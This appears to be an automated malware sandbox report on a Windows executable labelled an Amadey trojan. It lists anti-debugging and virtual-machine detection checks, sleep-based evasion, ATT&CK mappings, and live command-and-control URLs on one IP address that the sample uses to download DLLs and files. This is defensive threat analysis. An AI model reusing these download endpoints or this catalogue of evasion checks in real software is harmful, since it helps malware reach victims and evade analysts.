Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50FDC second address: 4D50FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50FE2 second address: 4D50FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D50FE6 second address: 4D51064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F0E05506CF6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0E05506CF1h 0x00000019 and si, E2E6h 0x0000001e jmp 00007F0E05506CF1h 0x00000023 popfd 0x00000024 push ecx 0x00000025 push ebx 0x00000026 pop eax 0x00000027 pop edi 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d mov dx, ax 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp-18h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0E05506CF9h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51064 second address: 4D51074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E055074FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51074 second address: 4D51078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51078 second address: 4D51087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe Special instruction interceptor: First address: 81C851 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exe Special instruction interceptor: First address: 81C922 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exe Special instruction interceptor: First address: 9C27D8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exe Special instruction interceptor: First address: 9C24BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exe Special instruction interceptor: First address: 9C9604 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exe Special instruction interceptor: First address: A46BCD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\4kahanaK78.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\4kahanaK78.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00AA30A3 rdtsc 0_2_00AA30A3
Source: C:\Users\user\Desktop\4kahanaK78.exe Window / User API: threadDelayed 2116
Source: C:\Users\user\Desktop\4kahanaK78.exe Window / User API: threadDelayed 1987
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5856 Thread sleep count: 56 > 30
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5856 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4832 Thread sleep count: 63 > 30
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4832 Thread sleep time: -126063s >= -30000s
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4368 Thread sleep count: 188 > 30
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5620 Thread sleep count: 2116 > 30
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5620 Thread sleep time: -4234116s >= -30000s
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4672 Thread sleep count: 1987 > 30
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4672 Thread sleep time: -3975987s >= -30000s
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5040 Thread sleep count: 55 > 30
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5040 Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00415D07 FindFirstFileExW, 0_2_00415D07
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_10007EA9 FindFirstFileExW, 0_2_10007EA9
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B55F6E FindFirstFileExW, 0_2_04B55F6E
Source: 4kahanaK78.exe, 4kahanaK78.exe, 00000000.00000002.3306653109.00000000009A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E45000.00000004.00000020.00020000.00000000.sdmp, 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp, 4kahanaK78.exe, 00000000.00000002.3309317789.00000000055A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 4kahanaK78.exe, 00000000.00000002.3306653109.00000000009A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\4kahanaK78.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\4kahanaK78.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\4kahanaK78.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\4kahanaK78.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\4kahanaK78.exe File opened: NTICE
Source: C:\Users\user\Desktop\4kahanaK78.exe File opened: SICE
Source: C:\Users\user\Desktop\4kahanaK78.exe File opened: SIWVID
Source: C:\Users\user\Desktop\4kahanaK78.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\4kahanaK78.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\4kahanaK78.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00AA30A3 rdtsc 0_2_00AA30A3
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040C0B3
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402950
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_3_04CF2A6F mov eax, dword ptr fs:[00000030h] 0_3_04CF2A6F
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_3_04CEE30D mov eax, dword ptr fs:[00000030h] 0_3_04CEE30D
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_0041366F mov eax, dword ptr fs:[00000030h] 0_2_0041366F
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h] 0_2_0040EF0D
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00D890A3 push dword ptr fs:[00000030h] 0_2_00D890A3
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h] 0_2_04B40D90
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B538D6 mov eax, dword ptr fs:[00000030h] 0_2_04B538D6
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h] 0_2_04B4092B
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B4F174 mov eax, dword ptr fs:[00000030h] 0_2_04B4F174
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc, 0_2_00402C70
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040C0B3
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00409949 SetUnhandledExceptionFilter, 0_2_00409949
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00408ED5
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004097B2
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10002ADF
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_100056A0
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10002FDA
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B4913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04B4913C
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B49A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04B49A19
Source: C:\Users\user\Desktop\4kahanaK78.exe Code function: 0_2_04B49BB0 SetUnhandledExceptionFilter, 0_2_04B49BB0
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B4C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B4C31A
Source: 4kahanaK78.exe, 4kahanaK78.exe, 00000000.00000002.3306653109.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: bUProgram Manager
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_3_04CE8DB3 cpuid 0_3_04CE8DB3
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
MITRE ATT&CK matrix, listed per tactic column (the number in parentheses is the count of matching signatures; techniques without a number are the matrix placeholders with no match):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Command and Scripting Interpreter (3), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Privilege Escalation: Process Injection (2), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (24), Process Injection (2), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: System Time Discovery (1), Security Software Discovery (681), Virtualization/Sandbox Evasion (24), Process Discovery (3), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (213)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (1), Application Layer Protocol (1), Fallback Channels, Multiband Communication, Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Source: 4kahanaK78.exe; Detection: 61%; Scanner: ReversingLabs; Label: Win32.Trojan.Amadey
Source: 4kahanaK78.exe; Detection: 100%; Scanner: Avira; Label: HEUR/AGEN.1320706
Source: 4kahanaK78.exe; Detection: 100%; Scanner: Joe Sandbox ML
No Antivirus matches
No contacted domains info
Name: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/dll/download; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/files/download; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/dll/key; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/soft/download; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/files/downloadpData; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/files/downloadpwT; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/files/downloadvwR; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/soft/downloadv9; Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/soft/downloadL9; Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/dll/key84; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://upx.sf.net; Source: Amcache.hve.6.dr; Malicious: false; Reputation: high
Name: http://185.156.73.23/files/downloadw$; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=emp; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23/files/downloadhw; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: http://185.156.73.23H; Source: 4kahanaK78.exe, 00000000.00000002.3309317789.00000000055AE000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
IP: 185.156.73.23; Domain: unknown; Country: Russian Federation; ASN: 48817; ASN Name: RELDAS-NETRU; Malicious: false
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578915
                                  Start date and time:2024-12-20 16:36:01 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 8s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:4kahanaK78.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:3c2e26d10fa55af2e913120df3b7eddb.exe
                                  Detection:MAL
                                  Classification:mal100.evad.winEXE@2/10@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.43, 4.245.163.56, 20.190.159.4
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: 4kahanaK78.exe
Time: 10:37:40; Type: API Interceptor; Description: 938318x Sleep call for process: 4kahanaK78.exe modified
Time: 10:38:57; Type: API Interceptor; Description: 1x Sleep call for process: WerFault.exe modified
Match: 185.156.73.23; Associated Sample Name: 7JKssbjRDa.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23/soft/download
Match: 185.156.73.23; Associated Sample Name: dI3n4LSHB7.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23/soft/download
Match: 185.156.73.23; Associated Sample Name: zmTSHkabY6.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23/soft/download
Match: 185.156.73.23; Associated Sample Name: 8V0INSl0E2.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23/soft/download
Match: 185.156.73.23; Associated Sample Name: BEd2lJRXFM.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23/soft/download
No context
Match: RELDAS-NETRU; Associated Sample Name: 7JKssbjRDa.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23
Match: RELDAS-NETRU; Associated Sample Name: dI3n4LSHB7.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23
Match: RELDAS-NETRU; Associated Sample Name: zmTSHkabY6.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23
Match: RELDAS-NETRU; Associated Sample Name: 8V0INSl0E2.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23
Match: RELDAS-NETRU; Associated Sample Name: BEd2lJRXFM.exe; Detection: malicious; Threat Name: Unknown; Context: 185.156.73.23
Match: RELDAS-NETRU; Associated Sample Name: beacon.exe; Detection: malicious; Threat Name: CobaltStrike; Context: 185.156.73.37
No context
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9436064750316326
                                  Encrypted:false
                                  SSDEEP:96:XBvwzjKUIc1sFThNFx7YjSYQXIDcQzc6EwcEcAcw3Jz69+HbHg/8BRTf3Oy1oVay:5vQ1I0N3qA9jjudUzuiFwZ24IO8e
                                  MD5:DB0F2D6FAEB55C86B39096C59AC84CB3
                                  SHA1:54552FD65842252D6889CCB3E008031102005F76
                                  SHA-256:6BB8142C915B17D41E5ACA1D38482D61BC98B03A60DEEE08DC5CA217E25A7167
                                  SHA-512:95372DA1580C4A8589C58572E9A2D1E91BB7AEF2914C7EFB5C3A0A73FF3F54F6E86B8BF631DF161879DA09685BC07114B0025CEABFE55AA55D9B319551E9581E
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.2.7.1.1.1.5.9.4.6.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.2.7.1.1.6.9.0.7.1.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.1.7.1.5.a.a.-.c.e.5.1.-.4.b.c.9.-.9.6.6.4.-.5.5.7.d.1.a.0.b.f.5.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.a.f.1.e.f.8.-.d.f.8.4.-.4.f.6.7.-.a.2.5.3.-.9.6.6.e.1.0.2.b.3.8.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.k.a.h.a.n.a.K.7.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.0.-.0.0.0.1.-.0.0.1.4.-.d.2.e.6.-.2.b.0.8.f.5.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.7.8.e.3.6.e.f.5.e.3.4.8.0.7.a.c.5.5.e.7.6.9.b.7.8.d.8.4.c.2.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.6.b.a.8.c.6.3.7.8.d.4.4.6.1.6.d.7.1.9.6.3.3.1.c.6.e.a.5.4.e.2.8.6.1.3.6.c.e.6.!.4.k.a.h.a.n.a.K.7.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:38:31 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):43034
                                  Entropy (8bit):2.55704812188654
                                  Encrypted:false
                                  SSDEEP:192:Yubx2Xcz4LwQX+FOioGx9H+4osdrEsyPjrxMCTcQrhLHlFYeBqES/qe0p1c:z/z4sjoPG3+4osHyWtgNFFXW/qq
                                  MD5:9C7612D1678A30D99AFA0261BD29356B
                                  SHA1:268F4ED9321E6BBAD28C0EADEA730AC59C120600
                                  SHA-256:FD09AE6C0A590BAFB53FDE5291198325600AE7E00DA2D28239E58AB48ADFCD92
                                  SHA-512:21361B88A359402C3260D32ED7FE3418D2F77CA3C4E83D26A6A9CEE5DCD0A3587EB26E21921660E36013E99F17A61F5F70EE85CD5E0D2EBD6731CDF1CBE885B5
                                  Malicious:false
                                  Reputation:low
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8394
                                  Entropy (8bit):3.692209903934503
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJiu6yj6YEIrSU9FgmfyGGpDj89bC1sfw2m:R6lXJj6u6YEUSU9FgmfyeCOfo
                                  MD5:99CC121510D915F0C364B1AB175EB7AF
                                  SHA1:1083159D09373DEE18D04BF2D670928419DDEDD4
                                  SHA-256:CBE7DDF476C22F8F585A7DFF537E298E1CF49CD7AD09B0B87B6688BDFE788FFE
                                  SHA-512:2FC52956DC2B5A97F245DAB7318F2EACFEC736A5153D75574C5F086A99C7F837C5C38F442B4282D13291E2523191BBE1776D350C92C4870E20C90D69B214FB8A
                                  Malicious:false
                                  Reputation:low
